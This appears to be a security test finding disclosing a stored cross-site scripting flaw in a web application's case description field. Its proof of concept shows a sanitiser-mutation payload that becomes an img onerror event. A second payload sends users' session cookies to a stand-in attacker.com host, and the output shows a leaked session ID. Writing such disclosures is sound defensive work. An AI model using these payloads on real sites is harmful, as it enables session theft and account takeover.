Description

When creating or editing a case, the web application fails to perform sufficient sanitisation on the description POST parameter, allowing users to inject HTML with malicious JavaScript events. The application does attempt to remove unauthorised elements and events; however, the testing team found it was possible to leverage the defences against the application to build a payload that, once sanitised, would be mutated to the intended malicious payload and trusted by the application.

Proof of Concept

Please see below for a demo proof of concept which shows the mutation from the user input, leading to an img tag being accepted by the web application, including an onerror event to display an alert box.

------WebKitFormBoundary4U8MLHW3Z3MyBsHm
Content-Disposition: form-data; name="description"

<svg><<svg>im<svg>g src=1 alt=''"<svg>on<svg>error='alert(2)' />

Resulting in the following HTML being shown in the case:

<img src alt="''">

As the web application also does not enforce the HTTPOnly flag on the session cookie, the following payload could be used to access the users session cookie. As the web application does also not implement a sufficient Content Security Policy (CSP) configuration, it is possible to then send each user’s cookies to an attacker-controlled domain upon viewing the malicious payload:

<svg><<svg>im<svg>g src=1 alt=''"<svg>on<svg>error='if(!window.payloadExecuted){window.payloadExecuted=true;this.src=`//attacker.co<svg>m/?cookie=`+<svg>docu<svg>ment.co<svg>okie}' />

Once accepted by the application, the following HTML will appear in the case:

<img src="//attacker.com/?cookie=PHPSESSID=4lj7o4rj58lon4nkrq320auk07; Accounts_sp_tab=All; Cases_sp_tab=All" alt="''">